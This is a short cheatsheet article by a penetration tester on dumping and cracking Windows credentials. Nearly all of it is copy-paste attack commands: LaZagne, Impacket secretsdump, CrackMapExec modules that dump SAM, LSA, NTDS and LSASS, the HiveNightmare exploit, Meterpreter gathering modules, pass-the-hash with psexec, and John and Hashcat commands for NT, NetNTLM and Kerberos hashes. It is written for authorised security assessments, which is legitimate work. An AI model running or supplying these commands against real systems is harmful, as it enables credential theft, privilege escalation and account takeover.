Windows — Credentials Dumping

by Karol Mazurek 


INTRODUCTION

This article presents current tools and techniques for Windows credential dumping. It is deliberately short and written in cheatsheet style: the main goal is to aggregate the commands in one place so you can copy and paste them during an assessment. As a bonus, at the end you will find the commands for cracking Windows hashes with John the Ripper and Hashcat.

  1. LaZagne
  2. Impacket
  3. CrackMapExec
  4. HiveNightmare (CVE-2021-36934)
  5. Meterpreter — credential_collector
  6. Meterpreter — smart_hashdump

1. LaZagne

  • Finding passwords for the most commonly-used software:
laZagne.exe all
  • Searching text, XML and Word files for the string "password":
findstr /si 'password' *.txt *.xml *.docx

2. Impacket

impacket-secretsdump $domain/$user:$pass@$ip

3. CrackMapExec

crackmapexec smb $ip -u $user -p $pass --sam
crackmapexec smb $ip -u $user -p $pass --lsa
crackmapexec smb $ip -u $user -p $pass --ntds
crackmapexec smb $ip -u $user -p $pass --ntds vss
crackmapexec smb $ip -u $user -p $pass -M lsassy
crackmapexec smb $ip -u $user -p $pass -M wireless
crackmapexec smb $ip -u $user -p $pass -M handlekatz
crackmapexec smb $ip -u $user -p $pass -M nanodump
crackmapexec smb $ip -u $user -p $pass -M procdump
crackmapexec smb $ip -u $user -p $pass --laps
crackmapexec smb $ip -u $user -p $pass -M gpp_password
gpp-decrypt $encrypted_password

4. HiveNightmare (CVE-2021-36934)

Exploit allowing you to read any registry hives as non-admin.

.\HiveNightmare.exe
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY local
impacket-psexec -hashes $hash $user@$ip

5. Meterpreter — credential_collector

migrate <id of lsass.exe>
run post/windows/gather/credentials/credential_collector

6. Meterpreter — smart_hashdump

run post/windows/gather/smart_hashdump

Bonus: cracking Windows hashes with John the Ripper and Hashcat

  • LM
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
  • NT
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
  • NetNTLMv1
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
  • NetNTLMv2
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 0 hash.txt
  • Kerberos 5 TGS-REP (krb5tgs)
john --format=krb5tgs hash.txt --wordlist=rockyou.txt
hashcat -m 13100 -a 0 hash.txt rockyou.txt
  • Kerberos 5 AS-REP (krb5asrep)
john --format=krb5asrep hash.txt --wordlist=rockyou.txt
hashcat -m 18200 -a 0 hash.txt rockyou.txt

About the Author

Karol Mazurek - penetration tester.
The article was originally published at: https://karol-mazurek95.medium.com/windows-credentials-dumping-5898d896d048

April 4, 2022
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013